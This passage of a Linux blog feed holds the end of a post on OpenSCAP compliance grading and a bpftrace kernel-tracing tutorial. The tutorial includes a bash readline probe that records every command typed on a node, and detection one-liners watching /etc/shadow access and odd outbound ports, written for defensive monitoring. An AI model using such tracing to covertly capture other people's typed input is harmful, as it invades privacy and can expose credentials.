# FAIL  1.6.1.3 Ensure AppArmor is enabled in bootloader config
#       Reason: GRUB_CMDLINE_LINUX missing apparmor=1 security=apparmor
#       Remediation: Update /etc/default/grub, run update-grub, reboot
#
# FAIL  3.1.1   Ensure IPv6 is disabled if not needed
#       Reason: net.ipv6.conf.all.disable_ipv6=0
#       Remediation: Set in /etc/sysctl.d/60-kernel-hardening.conf
# ...
#
# Overrides (compliant): 2
# ──────────────────────────────────────────────
# OVERRIDE  1.1.2   tmpfs /tmp via systemd unit — equivalent control
# OVERRIDE  5.2.4   SSH timeout managed by session manager policy
</code></pre>
<p>The failing controls tell you exactly what to fix and how to fix it. This is the difference between &#8220;87% passing&#8221; as a number and &#8220;87% passing&#8221; as an actionable gap list.</p>
<hr />
<h2 id="sarif-export">SARIF Export</h2>
<p>Every scan produces a SARIF (Static Analysis Results Interchange Format) file:</p>
<pre><code class="" data-line=""># Export scan results to SARIF
stratum scan \
  --instance i-0abc123 \
  --benchmark cis-l1 \
  --output sarif \
  --out-file scan-results/i-0abc123-cis-l1.sarif
</code></pre>
<p>SARIF is the standard format for security scan results. It&#8217;s directly importable into:</p>
<ul>
<li><strong>GitHub Advanced Security</strong> — upload via <code class="" data-line="">actions/upload-sarif</code>, results appear in the Security tab</li>
<li><strong>Jira</strong> — import as security findings, linked to the image or instance ID</li>
<li><strong>Splunk / SIEM</strong> — structured JSON, parseable as events</li>
<li><strong>AWS Security Hub</strong> — importable as findings via the Security Hub API</li>
</ul>
<p>For audit purposes, the SARIF file is the evidence artifact. It contains the full scan profile, every control result, the OpenSCAP version, the scan timestamp, and the machine it was run against.</p>
<pre><code class="" data-line=""># Upload to GitHub Advanced Security
stratum scan \
  --instance i-0abc123 \
  --benchmark cis-l1 \
  --output sarif \
  --github-upload \
  --github-ref $GITHUB_REF \
  --github-sha $GITHUB_SHA
</code></pre>
<hr />
<h2 id="drift-detection">Drift Detection</h2>
<p>The grade at build time is the baseline. Any instance can be rescanned against the blueprint that built it:</p>
<pre><code class="" data-line=""># Rescan a running instance
stratum scan --instance i-0abc123 --blueprint ubuntu22-cis-l1.yaml

# Output:
# Instance: i-0abc123 (launched from ami-0a7f3c9e82d1b4c05)
# Original grade (build):  A (94/100) — 2026-01-15
# Current grade (rescan):  B (87/100) — 2026-04-19
#
# Drifted controls (7):
#   3.3.2  TCP SYN cookies: FAIL — net.ipv4.tcp_syncookies=0
#           Last passing: 2026-01-15 (build)
#           Current value: 0 (expected: 1)
#
#   5.3.2  sudo log_input: FAIL — rule removed from /etc/sudoers.d/
#           Last passing: 2026-01-15 (build)
#           Current value: [rule absent] (expected: Defaults log_input)
</code></pre>
<p>Drift detection is how you find the instances that were &#8220;temporarily&#8221; modified and never reverted. The scan compares the current state against the baseline — not against a generic CIS profile, but against the specific blueprint version that built the image.</p>
<hr />
<h2 id="scanning-without-a-build-assessing-existing-instances">Scanning Without a Build: Assessing Existing Instances</h2>
<p>For instances not built with Stratum, you can run a standalone scan:</p>
<pre><code class="" data-line=""># Assess an existing instance against CIS L1
stratum scan --instance i-0legacy123 --benchmark cis-l1

# No blueprint comparison — just the raw CIS grade
# Output:
# Grade: C (72/100)
# 28 controls failing
# ...
</code></pre>
<p>This is useful for assessing the state of instances built before Stratum was in use, or for comparing a manual hardening approach against the benchmark.</p>
<hr />
<h2 id="what-controls-typically-block-an-a-grade">What Controls Typically Block an A Grade</h2>
<p>For Ubuntu 22.04 CIS L1 builds in most cloud environments, these are the controls that most commonly prevent an A grade:</p>
<table>
<thead>
<tr>
<th>Control</th>
<th>Why it often fails</th>
<th>Fix</th>
</tr>
</thead>
<tbody>
<tr>
<td>1.1.7 <code class="" data-line="">/var/log/audit</code> separate partition</td>
<td>Cloud images don&#8217;t have separate volumes at build time</td>
<td>Add EBS volume, configure at launch</td>
</tr>
<tr>
<td>1.6.1 AppArmor bootloader config</td>
<td>GRUB parameters not set correctly</td>
<td>Update <code class="" data-line="">/etc/default/grub</code>, run <code class="" data-line="">update-grub</code></td>
</tr>
<tr>
<td>3.1.1 Disable IPv6</td>
<td>Cloud networking sometimes requires IPv6</td>
<td>Override with documented reason if intentional</td>
</tr>
<tr>
<td>5.2.21 SSH MaxStartups</td>
<td>Default sshd_config not updated</td>
<td>Add <code class="" data-line="">MaxStartups 10:30:60</code> to sshd_config</td>
</tr>
<tr>
<td>6.1.10 World-writable files</td>
<td>Some package installations leave world-writable files</td>
<td>Post-install cleanup in Ansible role</td>
</tr>
</tbody>
</table>
<p>The first two (separate audit partition, AppArmor bootloader) are the most common A→B blockers and often require architecture decisions about how volumes are provisioned at launch versus build time.</p>
<hr />
<h2 id="key-takeaways">Key Takeaways</h2>
<ul>
<li>Automated OpenSCAP compliance means every image has a verified, reproducible grade generated by the same scanner with the same profile, before it&#8217;s ever deployed</li>
<li>The A-F grade accounts for documented overrides from the blueprint — the failing controls in the output are genuine gaps, not known exceptions</li>
<li>SARIF export makes scan results importable into GitHub Advanced Security, Jira, SIEM, and audit tooling</li>
<li>Drift detection catches configuration changes that happen after the image is deployed — the grade at build time is the baseline</li>
<li>Images that score below <code class="" data-line="">min_grade</code> don&#8217;t get snapshotted — the failed build tells you exactly which controls to fix</li>
</ul>
<hr />
<h2 id="whats-next">What&#8217;s Next</h2>
<p>Automated OpenSCAP compliance gives every image a verified grade before deployment. What EP04 left open is what happens after the grade is known — specifically, what prevents an engineer from deploying a C-grade image to production &#8220;just this once.&#8221;</p>
<p>The Pipeline API is the answer. EP05 covers the CI/CD compliance gate: <code class="" data-line="">POST /api/pipeline/scan</code> fails the build if the image grade is below threshold. The unhardened image never reaches production — not because engineers are disciplined, but because the pipeline won&#8217;t let it through.</p>
<p><em>Next: <a href="/cicd-compliance-gate-hardened-images/">CI/CD compliance gate — block unhardened images before they reach production</a></em></p>
<p>Get EP05 in your inbox when it publishes → <a href="https://linuxcent.com/subscribe">linuxcent.com/subscribe</a></p>
<p><a class="a2a_button_mastodon" href="https://www.addtoany.com/add_to/mastodon?linkurl=https%3A%2F%2Flinuxcent.com%2Fautomated-compliance-scanning-openscap%2F&amp;linkname=Compliance%20Grading%20%E2%80%94%20Automated%20OpenSCAP%20with%20A-F%20Scores%20Before%20Deployment" title="Mastodon" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Flinuxcent.com%2Fautomated-compliance-scanning-openscap%2F&amp;linkname=Compliance%20Grading%20%E2%80%94%20Automated%20OpenSCAP%20with%20A-F%20Scores%20Before%20Deployment" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_whatsapp" href="https://www.addtoany.com/add_to/whatsapp?linkurl=https%3A%2F%2Flinuxcent.com%2Fautomated-compliance-scanning-openscap%2F&amp;linkname=Compliance%20Grading%20%E2%80%94%20Automated%20OpenSCAP%20with%20A-F%20Scores%20Before%20Deployment" title="WhatsApp" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Flinuxcent.com%2Fautomated-compliance-scanning-openscap%2F&amp;linkname=Compliance%20Grading%20%E2%80%94%20Automated%20OpenSCAP%20with%20A-F%20Scores%20Before%20Deployment" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_x" href="https://www.addtoany.com/add_to/x?linkurl=https%3A%2F%2Flinuxcent.com%2Fautomated-compliance-scanning-openscap%2F&amp;linkname=Compliance%20Grading%20%E2%80%94%20Automated%20OpenSCAP%20with%20A-F%20Scores%20Before%20Deployment" title="X" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Flinuxcent.com%2Fautomated-compliance-scanning-openscap%2F&amp;linkname=Compliance%20Grading%20%E2%80%94%20Automated%20OpenSCAP%20with%20A-F%20Scores%20Before%20Deployment" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_copy_link" 
href="https://www.addtoany.com/add_to/copy_link?linkurl=https%3A%2F%2Flinuxcent.com%2Fautomated-compliance-scanning-openscap%2F&amp;linkname=Compliance%20Grading%20%E2%80%94%20Automated%20OpenSCAP%20with%20A-F%20Scores%20Before%20Deployment" title="Copy Link" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share#url=https%3A%2F%2Flinuxcent.com%2Fautomated-compliance-scanning-openscap%2F&#038;title=Compliance%20Grading%20%E2%80%94%20Automated%20OpenSCAP%20with%20A-F%20Scores%20Before%20Deployment" data-a2a-url="https://linuxcent.com/automated-compliance-scanning-openscap/" data-a2a-title="Compliance Grading — Automated OpenSCAP with A-F Scores Before Deployment"></a></p><p>The post <a href="https://linuxcent.com/automated-compliance-scanning-openscap/">Compliance Grading — Automated OpenSCAP with A-F Scores Before Deployment</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://linuxcent.com/automated-compliance-scanning-openscap/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">1828</post-id>	</item>
		<item>
		<title>bpftrace — Kernel Answers in One Line</title>
		<link>https://linuxcent.com/bpftrace-kernel-observability/</link>
					<comments>https://linuxcent.com/bpftrace-kernel-observability/#respond</comments>
		
		<dc:creator><![CDATA[Vamshi Krishna Santhapuri]]></dc:creator>
		<pubDate>Sun, 10 May 2026 02:00:00 +0000</pubDate>
				<category><![CDATA[eBPF]]></category>
		<category><![CDATA[bpftrace]]></category>
		<category><![CDATA[Kubernetes]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Observability]]></category>
		<category><![CDATA[Performance]]></category>
		<category><![CDATA[SRE]]></category>
		<category><![CDATA[Tracing]]></category>
		<guid isPermaLink="false">https://linuxcent.com/?p=1839</guid>

					<description><![CDATA[<p><span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 8</span> <span class="rt-label rt-postfix">minutes</span></span>bpftrace gives you kernel observability in a one-liner. Trace syscalls, connections, and process spawns across any Kubernetes node — no app changes, no restart, no sampling.</p>
<p>The post <a href="https://linuxcent.com/bpftrace-kernel-observability/">bpftrace — Kernel Answers in One Line</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></description>
										<content:encoded><![CDATA[<span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 8</span> <span class="rt-label rt-postfix">minutes</span></span><style>
/* Code panels: dark background, monospace text, accent bar on the left edge. */
pre {
  position: relative;
  background: #1e1e1e;
  color: #d4d4d4;
  padding: 16px 16px 16px 20px;
  border-radius: 6px;
  overflow-x: auto;
  font-family: 'JetBrains Mono', 'Fira Code', 'Cascadia Code', Consolas, 'Courier New', monospace;
  font-size: .88em;
  line-height: 1.6;
  border-left: 4px solid #555;
}
/* Inline code gets a light chip; code nested in a panel inherits the panel look. */
code {
  background: #f4f4f4;
  padding: 2px 5px;
  border-radius: 3px;
  font-size: .9em;
}
pre code {
  background: transparent;
  padding: 0;
  color: inherit;
}
/* Accent bar colour keyed on the panel's data-lang attribute. */
pre[data-lang="bash"],
pre[data-lang="sh"],
pre[data-lang="shell"],
pre[data-lang="zsh"] {
  border-left-color: #4ec9b0;
}
pre[data-lang="yaml"],
pre[data-lang="json"],
pre[data-lang="toml"],
pre[data-lang="xml"] {
  border-left-color: #569cd6;
}
pre[data-lang="python"],
pre[data-lang="go"],
pre[data-lang="rust"],
pre[data-lang="java"],
pre[data-lang="c"],
pre[data-lang="cpp"] {
  border-left-color: #c586c0;
}
pre[data-lang="text"],
pre[data-lang="output"],
pre[data-lang="console"] {
  border-left-color: #888;
}
/* Copy button: pinned top-right, invisible until the panel is hovered. */
.lc-copy-btn {
  position: absolute;
  top: 8px;
  right: 8px;
  background: #2d2d2d;
  color: #ccc;
  border: 1px solid #444;
  border-radius: 4px;
  padding: 3px 9px;
  font-size: .75em;
  font-family: system-ui, sans-serif;
  cursor: pointer;
  opacity: 0;
  transition: opacity .15s, background .15s;
  line-height: 1.6;
}
pre:hover .lc-copy-btn {
  opacity: 1;
}
.lc-copy-btn:hover {
  background: #3a3a3a;
  color: #fff;
}
.lc-copy-btn.copied {
  color: #4ec9b0;
  border-color: #4ec9b0;
}
/* Language badge: pinned top-left, never intercepts clicks, shown on hover. */
.lc-lang-badge {
  position: absolute;
  top: 8px;
  left: 20px;
  font-family: system-ui, sans-serif;
  font-size: .7em;
  color: #666;
  text-transform: uppercase;
  letter-spacing: .04em;
  line-height: 1;
  pointer-events: none;
  opacity: 0;
  transition: opacity .15s;
}
pre:hover .lc-lang-badge {
  opacity: 1;
}
/* Tables: full width, bordered cells, shaded header and even rows. */
table {
  border-collapse: collapse;
  width: 100%;
  margin: 16px 0;
}
th,
td {
  border: 1px solid #ddd;
  padding: 10px 14px;
  text-align: left;
}
th {
  background: #f0f0f0;
  font-weight: 600;
}
tr:nth-child(even) {
  background: #fafafa;
}
</style>
<p><script>
(function(){
  /* Decorates every <pre> on the page with an optional language badge and a "Copy" button. */
  /* The window flag makes a repeated inclusion of this snippet a no-op. */
  if(window.__lcCodeEnhanced)return;
  window.__lcCodeEnhanced=true;
  /* Walk all <pre> elements once and attach the badge, the button and its click handler. */
  function enhance(){
    document.querySelectorAll('pre').forEach(function(pre){
      var code=pre.querySelector('code');
      var lang='';
      /* The language is taken from a "language-xxx" class on the inner <code>, when present. */
      if(code){var m=(code.className||'').match(/language-(\S+)/);if(m)lang=m[1].toLowerCase();}
      if(lang){
        pre.setAttribute('data-lang',lang);
        var badge=document.createElement('span');badge.className='lc-lang-badge';badge.textContent=lang;
        pre.insertBefore(badge,pre.firstChild);
      }
      var btn=document.createElement('button');
      /* Explicit type so a click can never submit an enclosing form. */
      btn.type='button';
      btn.className='lc-copy-btn';btn.textContent='Copy';btn.setAttribute('aria-label','Copy code to clipboard');
      pre.appendChild(btn);
      btn.addEventListener('click',function(){
        /* Without a <code> child the text must come from the <pre> itself, minus the injected controls. */
        var text=code?code.innerText:ownText(pre);
        if(navigator.clipboard&&window.isSecureContext){
          navigator.clipboard.writeText(text).then(function(){ok(btn);}).catch(function(){fb(text,btn);});
        }else{fb(text,btn);}
      });
    });
  }
  /* Text of a <pre> with the injected badge/button removed, so their labels are never copied. */
  function ownText(pre){
    var copy=pre.cloneNode(true);
    copy.querySelectorAll('.lc-copy-btn,.lc-lang-badge').forEach(function(n){n.parentNode.removeChild(n);});
    return copy.textContent;
  }
  /* Success feedback: show "Copied!" for two seconds, then restore the label. */
  function ok(btn){btn.textContent='Copied!';btn.classList.add('copied');setTimeout(function(){btn.textContent='Copy';btn.classList.remove('copied');},2000);}
  /* Failure feedback: show the failure label for two seconds, then restore the label. */
  function fail(btn){btn.textContent='✗ Failed';setTimeout(function(){btn.textContent='Copy';},2000);}
  /* Fallback copy through an off-screen textarea and document.execCommand('copy'). */
  function fb(text,btn){
    var ta=document.createElement('textarea');
    var copied=false;
    try{
      ta.value=text;ta.style.cssText='position:fixed;left:-9999px;top:-9999px;opacity:0';
      document.body.appendChild(ta);ta.select();
      /* execCommand signals failure by returning false, not by throwing. */
      copied=document.execCommand('copy');
    }catch(e){copied=false;}
    /* Always remove the helper textarea, including after an exception. */
    finally{if(ta.parentNode)ta.parentNode.removeChild(ta);}
    if(copied){ok(btn);}else{fail(btn);}
  }
  if(document.readyState==='loading'){document.addEventListener('DOMContentLoaded',enhance);}else{enhance();}
})();
</script></p>
<p><em>eBPF: From Kernel to Cloud, Episode 9</em><br />
<em><a href="https://linuxcent.com/what-is-ebpf-linux-kubernetes/">What Is eBPF?</a> · <a href="https://linuxcent.com/bpf-verifier-kubernetes-safety/">The BPF Verifier</a> · <a href="https://linuxcent.com/ebpf-vs-kernel-modules-kubernetes/">eBPF vs Kernel Modules</a> · <a href="https://linuxcent.com/ebpf-program-types-kubernetes/">eBPF Program Types</a> · <a href="https://linuxcent.com/ebpf-maps-explained/">eBPF Maps</a> · <a href="https://linuxcent.com/ebpf-co-re-libbpf-portable-programs/">CO-RE and libbpf</a> · <a href="https://linuxcent.com/ebpf-xdp-kubernetes-networking/">XDP</a> · <a href="https://linuxcent.com/ebpf-tc-pod-policy/">TC eBPF</a> · </em><em><strong>bpftrace</strong></em></p>
<hr />
<p style="font-size:0.72em;font-weight:700;letter-spacing:0.12em;color:#f59e0b;text-transform:uppercase;margin:2em 0 0.75em 0;text-align:center;">Architecture Overview</p>
<figure class="wp-block-image size-full" style="margin:0 0 0.5em 0;">
<img loading="lazy" decoding="async" width="2091" height="2560" src="https://linuxcent.com/wp-content/uploads/2026/05/ep09-bpftrace-og-2-scaled.png" alt="bpftrace and eBPF Tracing — dynamic kernel observability showing probe types and output pipeline" class="wp-image-2117" style="width:100%;height:auto;display:block;border-radius:8px;" srcset="https://linuxcent.com/wp-content/uploads/2026/05/ep09-bpftrace-og-2-scaled.png 2091w, https://linuxcent.com/wp-content/uploads/2026/05/ep09-bpftrace-og-2-245x300.png 245w, https://linuxcent.com/wp-content/uploads/2026/05/ep09-bpftrace-og-2-836x1024.png 836w, https://linuxcent.com/wp-content/uploads/2026/05/ep09-bpftrace-og-2-768x940.png 768w, https://linuxcent.com/wp-content/uploads/2026/05/ep09-bpftrace-og-2-1255x1536.png 1255w, https://linuxcent.com/wp-content/uploads/2026/05/ep09-bpftrace-og-2-1673x2048.png 1673w" sizes="auto, (max-width: 2091px) 100vw, 2091px" /><figcaption style="text-align:center;font-size:0.85em;color:#6b7280;margin-top:0.75em;">bpftrace attaches probes at runtime — no recompilation, no restarts, full kernel visibility in one line.</figcaption></figure>
<hr style="border:none;border-top:1px solid #e5e7eb;margin:0.5em 0 2em 0;"/>
<h2 id="tldr">TL;DR</h2>
<ul>
<li>bpftrace is an eBPF compiler, not a monitoring agent — every one-liner compiles, loads, runs, and cleans up a complete kernel program<br />
<em>(think of it like <code class="" data-line="">kubectl exec</code> — but for asking the kernel a direct question, with no agent, no sidecar, no prior setup)</em></li>
<li>kretprobe and tracepoint cover most production debugging needs; use tracepoints for stability across kernel versions</li>
<li>The security use cases are unique: kernel-level observation that an attacker inside a container cannot suppress</li>
<li>Every connection, every file open, every process spawn — observable in real time with a single command, no prior instrumentation</li>
<li>Production caution: high-frequency probes on hot paths add overhead; filter by pid/comm, use <code class="" data-line="">--timeout</code>, watch <code class="" data-line="">%si</code></li>
<li>Container PIDs are host-namespace PIDs in bpftrace — use <code class="" data-line="">curtask-&gt;real_parent-&gt;tgid</code> to correlate to container activity</li>
</ul>
<hr />
<p>bpftrace turns any kernel question into a one-liner — compiling, loading, and attaching a complete eBPF program in seconds, with no agents, no restarts, and no prior instrumentation on the node. When something is wrong on a node right now and you don&#8217;t know where to look, it&#8217;s how you ask the kernel a direct question. That&#8217;s what EP09 is about.</p>
<h2 id="quick-check-is-bpftrace-available-on-your-node">Quick Check: Is bpftrace Available on Your Node?</h2>
<p>Before the one-liner toolkit — verify bpftrace is installed and working on a cluster node:</p>
<pre><code class="" data-line=""># SSH into a worker node, then:
bpftrace --version
# bpftrace v0.19.0   ← any version ≥ 0.16 supports the patterns in this episode

# Verify BTF is available (required for struct access one-liners)
ls /sys/kernel/btf/vmlinux &amp;&amp; echo &quot;BTF available&quot;

# The simplest possible one-liner — count syscalls for 5 seconds
bpftrace -e &#039;tracepoint:raw_syscalls:sys_enter { @[comm] = count(); }&#039; --timeout 5
</code></pre>
<p>Expected output (abridged):</p>
<pre><code class="" data-line="">Attaching 1 probe...

@[containerd]: 312
@[kubelet]:    841
@[node_exporter]: 203
@[sshd]:       47
</code></pre>
<p>Each line is a process name and how many syscalls it made in 5 seconds. If this runs and produces output, everything in this episode will work on your node.</p>
<blockquote>
<p><strong>Not on a self-managed node?</strong> EKS managed nodes and GKE nodes don&#8217;t have bpftrace pre-installed, but you can run it from a privileged debug pod: <code class="" data-line="">kubectl debug node/&lt;node-name&gt; -it --image=quay.io/iovisor/bpftrace</code>. The tool runs on the host kernel — you get full kernel visibility even from a pod.</p>
</blockquote>
<hr />
<p>A node in production started showing elevated TCP latency — p99 at 180ms, where p99 was normally under 10ms. The application logs were clean. The APM dashboard showed nothing unusual at the service level. CPU, memory, disk: all normal. The load balancer health checks were passing.</p>
<p>I had 12 minutes before the on-call escalation would have gone to the application team and started a war room.</p>
<p>I ran one command:</p>
<pre><code class="" data-line="">bpftrace -e &#039;kretprobe:tcp_recvmsg { @bytes[comm] = hist(retval); }&#039; --timeout 10
</code></pre>
<p>Ten seconds of sampling. The histogram output showed a single process — <code class="" data-line="">backup-agent</code> — receiving 4MB chunks at irregular intervals. Not the application. Not the service mesh. A backup agent that runs at the infrastructure layer, saturating the receive path with large reads during its scheduled window.</p>
<p>Found in 9 seconds. War room averted.</p>
<p>What made that possible is something most engineers don&#8217;t know about bpftrace: that one-liner is not a monitoring query. It&#8217;s a complete eBPF program — compiled, loaded into the kernel, attached to the <code class="" data-line="">tcp_recvmsg</code> kernel return probe, run, and cleaned up — all in ten seconds. bpftrace is a compiler that happens to have a very convenient command-line interface.</p>
<hr />
<h2 id="what-bpftrace-actually-is">What bpftrace Actually Is</h2>
<p>bpftrace is not a monitoring tool. It&#8217;s an eBPF compiler with a high-level scripting language designed for one-shot investigation.</p>
<p>When you run <code class="" data-line="">bpftrace -e &#039;kretprobe:tcp_recvmsg { ... }&#039;</code>, this is what happens:</p>
<pre><code class="" data-line="">Your one-liner
      ↓
bpftrace&#039;s built-in LLVM/Clang frontend
      ↓
eBPF bytecode (.bpf.o in memory)
      ↓
Kernel verifier validates the program
      ↓
JIT compiler compiles to native machine code
      ↓
Program attaches to tcp_recvmsg kretprobe
      ↓
Runs until Ctrl-C or --timeout
      ↓
Output printed, maps freed, program detached
</code></pre>
<p>The kernel doesn&#8217;t know bpftrace wrote the program. It&#8217;s the same path as Falco, Cilium, Tetragon — kernel program loaded via the BPF syscall, verified, JIT-compiled, attached to a probe. bpftrace just wraps that entire process in a scripting language that takes 30 seconds to write instead of an afternoon.</p>
<p>This is why bpftrace can answer questions that no other tool can: it compiles to a kernel-level observer that fires on any event in the kernel, on any process, on any container — without any prior instrumentation.</p>
<hr />
<h2 id="the-four-probe-types-youll-use-most">The Four Probe Types You&#8217;ll Use Most</h2>
<p>bpftrace supports 20+ probe types. These four cover 90% of production debugging:</p>
<h3 id="kprobe-kretprobe-kernel-functions">kprobe / kretprobe — Kernel Functions</h3>
<p>Attaches to the entry (<code class="" data-line="">kprobe</code>) or return (<code class="" data-line="">kretprobe</code>) of any kernel function. The most powerful probes for understanding what the kernel is actually doing.</p>
<pre><code class="" data-line=""># Fire on every call to tcp_connect — who&#039;s making new TCP connections?
bpftrace -e &#039;kprobe:tcp_connect { printf(&quot;%s PID %d connecting\n&quot;, comm, pid); }&#039;

# On return from tcp_recvmsg — how large are the reads per process?
bpftrace -e &#039;kretprobe:tcp_recvmsg { @[comm] = hist(retval); }&#039;

# Count calls to vfs_write per process (file write activity)
bpftrace -e &#039;kprobe:vfs_write { @[comm] = count(); }&#039;
</code></pre>
<p>Limitation: kernel functions are internal and can change between kernel versions. Use tracepoints (below) for stability when you can.</p>
<blockquote>
<p><strong>kprobe instability:</strong> A function targeted by a kprobe can be <em>inlined</em> by the kernel compiler — the compiler embeds the function&#8217;s code at its call sites with no separate entry point. When that happens, the kprobe silently fires on nothing. Verify before relying on one: <code class="" data-line="">bpftrace -l &#039;kprobe:function_name&#039;</code> — empty response means it was inlined. Use a tracepoint equivalent instead.</p>
</blockquote>
<h3 id="tracepoint-stable-kernel-trace-points">tracepoint — Stable Kernel Trace Points</h3>
<p>Tracepoints are stable, versioned hooks explicitly placed in the kernel source. Unlike kprobes, they are part of the kernel&#8217;s public interface and guaranteed not to disappear between versions. Use these for anything you need to work reliably across a fleet with mixed kernel versions.</p>
<pre><code class="" data-line=""># Every file open — process name + filename
bpftrace -e &#039;tracepoint:syscalls:sys_enter_openat {
    printf(&quot;%s %s\n&quot;, comm, str(args-&gt;filename));
}&#039;

# Every outbound connect() call — process name and PID
bpftrace -e &#039;tracepoint:syscalls:sys_enter_connect {
    printf(&quot;%-16s %-6d\n&quot;, comm, pid);
}&#039;

# List all available tracepoints (hundreds)
bpftrace -l &#039;tracepoint:syscalls:*&#039; | head -30
</code></pre>
<h3 id="uprobe-userspace-function-probes">uprobe — Userspace Function Probes</h3>
<p>Attaches to a specific function in a userspace binary or library. Useful for observing application behaviour without recompiling.</p>
<pre><code class="" data-line=""># What bash commands are being typed on this node?
bpftrace -e &#039;uprobe:/bin/bash:readline { printf(&quot;%s\n&quot;, str(arg0)); }&#039;

# Python function calls
bpftrace -e &#039;uprobe:/usr/bin/python3:PyObject_Call { printf(&quot;Python call: pid %d\n&quot;, pid); }&#039;
</code></pre>
<p>From a security standpoint: this is how you observe what an attacker is typing in an interactive shell they&#8217;ve obtained on your node — in real time, from the kernel, without touching the terminal session.</p>
<h3 id="interval-periodic-sampling">interval — Periodic Sampling</h3>
<p>Runs a block of code on a fixed interval. Used for aggregation and periodic stats.</p>
<pre><code class="" data-line=""># Print the top file-opening processes every 5 seconds
bpftrace -e &#039;
kprobe:vfs_open { @[comm] = count(); }
interval:s:5  { print(@); clear(@); }
&#039;
</code></pre>
<hr />
<h2 id="the-one-liner-toolkit-runnable-right-now">The One-Liner Toolkit: Runnable Right Now</h2>
<p>These run on any Linux node with BTF (kernel 5.8+, Ubuntu 20.04+, most managed K8s nodes):</p>
<pre><code class="" data-line=""># What files is every process opening right now? (30-second view)
bpftrace -e &#039;tracepoint:syscalls:sys_enter_openat {
    printf(&quot;%-16s %s\n&quot;, comm, str(args-&gt;filename));
}&#039; --timeout 30

# Who is making DNS queries? (catches queries from any container, no sidecar needed)
bpftrace -e &#039;tracepoint:net:net_dev_xmit {
    if (args-&gt;skbaddr-&gt;protocol == 0x0800) printf(&quot;%s\n&quot;, comm);
}&#039;

# Latency histogram for all read() syscalls — find the slow process
bpftrace -e &#039;
tracepoint:syscalls:sys_enter_read { @start[tid] = nsecs; }
tracepoint:syscalls:sys_exit_read  {
    $latency = nsecs - @start[tid];
    @latency[comm] = hist($latency);
    delete(@start[tid]);
}&#039; --timeout 15

# Which process is using the most CPU right now? (99Hz sampling)
bpftrace -e &#039;profile:hz:99 { @[comm] = count(); }&#039; --timeout 10

# Real-time syscall frequency — find unusual process activity
bpftrace -e &#039;tracepoint:raw_syscalls:sys_enter { @[comm, args-&gt;id] = count(); }&#039; --timeout 10 \
  | sort -k3 -rn | head -20

# New TCP connections in the last 30 seconds — source and dest
bpftrace -e &#039;kprobe:tcp_connect {
    $sk = (struct sock *)arg0;
    printf(&quot;%-16s → %s:%d\n&quot;, comm,
           ntop(AF_INET, $sk-&gt;__sk_common.skc_daddr),
           $sk-&gt;__sk_common.skc_dport &gt;&gt; 8);
}&#039; --timeout 30

# What is a specific PID doing? (replace 12345)
bpftrace -e &#039;tracepoint:syscalls:sys_enter_openat /pid == 12345/ {
    printf(&quot;%s\n&quot;, str(args-&gt;filename));
}&#039;
</code></pre>
<p>Each of these compiles and loads in under 2 seconds. They leave no persistent state. When they exit, the kernel reverts to exactly the state it was in before.</p>
<hr />
<h2 id="the-security-use-cases">The Security Use Cases</h2>
<h3 id="watching-an-active-session">Watching an Active Session</h3>
<p>If you suspect a process is running commands you didn&#8217;t deploy:</p>
<pre><code class="" data-line=""># See every bash command on this node in real time
bpftrace -e &#039;uprobe:/bin/bash:readline { printf(&quot;%s %s\n&quot;, comm, str(arg0)); }&#039;

# Every process spawn — PID, parent, command
bpftrace -e &#039;tracepoint:syscalls:sys_enter_execve {
    printf(&quot;%-6d %-6d %s\n&quot;, pid, curtask-&gt;real_parent-&gt;tgid, str(args-&gt;filename));
}&#039;
</code></pre>
<p>This is the kernel-level version of watching <code class="" data-line="">/var/log/auth.log</code> — except it can&#8217;t be suppressed by an attacker who has root, because the probe runs in kernel space. An attacker who has compromised a container with root inside the container cannot prevent a bpftrace program on the host from observing their syscalls.</p>
<h3 id="detecting-unexpected-network-activity">Detecting Unexpected Network Activity</h3>
<pre><code class="" data-line=""># Any process making a connection to a non-standard port
bpftrace -e &#039;kprobe:tcp_connect {
    $sk = (struct sock *)arg0;
    $port = $sk-&gt;__sk_common.skc_dport &gt;&gt; 8;
    if ($port != 80 &amp;&amp; $port != 443 &amp;&amp; $port != 53) {
        printf(&quot;%-16s port %d\n&quot;, comm, $port);
    }
}&#039;

# DNS queries to non-standard resolvers (anything not on port 53)
bpftrace -e &#039;tracepoint:syscalls:sys_enter_sendto {
    if (args-&gt;addr-&gt;sa_family == 2) {
        printf(&quot;%-16s → %s\n&quot;, comm, str(args-&gt;addr));
    }
}&#039;
</code></pre>
<h3 id="watching-file-access-on-sensitive-paths">Watching File Access on Sensitive Paths</h3>
<pre><code class="" data-line=""># Any open of /etc/passwd or /etc/shadow
bpftrace -e &#039;tracepoint:syscalls:sys_enter_openat {
    if (str(args-&gt;filename) == &quot;/etc/passwd&quot; ||
        str(args-&gt;filename) == &quot;/etc/shadow&quot;) {
        printf(&quot;%-16s PID %-6d opened %s\n&quot;, comm, pid, str(args-&gt;filename));
    }
}&#039;
</code></pre>
<hr />
<h2 id="production-gotchas">Production Gotchas</h2>
<p><strong>CPU overhead:</strong> bpftrace probes fire synchronously in the traced context. High-frequency probes on hot kernel paths (<code class="" data-line="">vfs_read</code>, <code class="" data-line="">sys_enter_*</code> without filtering) can add 10–20% overhead. Always test with <code class="" data-line="">--timeout</code> and watch <code class="" data-line="">%si</code> before running on a production node.</p>
